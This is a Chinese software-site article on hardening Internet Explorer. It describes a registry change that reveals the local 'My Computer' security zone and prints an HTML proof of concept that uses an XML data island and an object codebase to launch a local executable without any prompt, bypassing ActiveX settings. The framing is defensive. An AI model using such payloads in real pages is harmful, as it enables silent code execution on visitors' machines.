IE防黑技巧十则，让你绿色上网更安全《四》

图一 IE防黑技巧十则，让你绿色上网更安全《四》

进入下载

Internet Explorer 8.0 XP 8.0 官方中文版...
大小：16.11 MB
日期：2019/9/7 15:34:16
环境：WinXP,

核心提示：针对IE的恶意修改、攻击方法非常多，本文中介绍的十种反黑技巧，一定会对你有所帮助。

针对IE的恶意修改、攻击方法非常多，本文中介绍的十种反黑技巧，一定会对你有所帮助。

下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternet Settingsones，在右边窗口中找到DWord值“Flags”，默认键值为十六进制的21（十进制33），双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以对IE的本地安全进行配置。

图二 IE防黑技巧十则，让你绿色上网更安全《四》

这个小技巧有什么用呢？把下面的代码保存为一个html文件，然后运行试试就知道了：

注意：请把<；替换为向左的尖括号，把>；替换为向右的尖括号。

<；span datasrc=\"#oExec\" datafld=\"exploit\" dataformatas=\"html">；<；/span>；

<；xml id=\"oExec\">；

<；security>；

<；exploit>；

<；！[CDATA[

<；object id=\"oFile\"

classid=\"clsid：88888888-8888-8888-8888-888888888888"

codebase=\"c：/winnt/system32/calc.exe">；<；/object>；

]]>；

<；/exploit>；

<；/security>；

<；/xml>；

运行上面的html文件，会打开你的计算机中c：/winnt/system32文件夹下的calc.exe文件！而且IE没有任何提示！即使在IE的安全设置中禁用ActiveX控件上述代码也能工作！如果不是calc.exe文件而是其他恶意文件又会怎么样？如果是在你浏览的网页中含有类似上面的代码又会怎么样？真危险啊！

图三 IE防黑技巧十则，让你绿色上网更安全《四》

之所以会这样是由于IE存在两个可怕的漏洞：可本地执行任意命令，IE的ActiveX安全设置可被绕过。在上述代码中我们给IE指定了一个系统中并不存在的控件号（\"clsid：88888888-8888-8888-8888-888888888888），IE会试图从codebase指定的地址去下载并安装改控件。根据codebase于是IE找到了c：/winnt/system32/calc.exe，接着IE开始“下载”并安装该程序。由于calc.exe是EXE文件，这样就等于是在运行该文件，所以calc.exe就被运行了！

Internet Explorer 8.0 XP 8.0 官方中文版

• 软件性质：国外软件
• 授权方式：免费版
• 软件语言：简体中文
• 软件大小：16499 KB
• 下载次数：15860 次
• 更新时间：2019/9/7 8:21:48
• 运行平台：WinXP,...
• 软件描述：IE8(Internet Explorer 8)是一款优秀的多标签网页浏览器，由... [立即下载]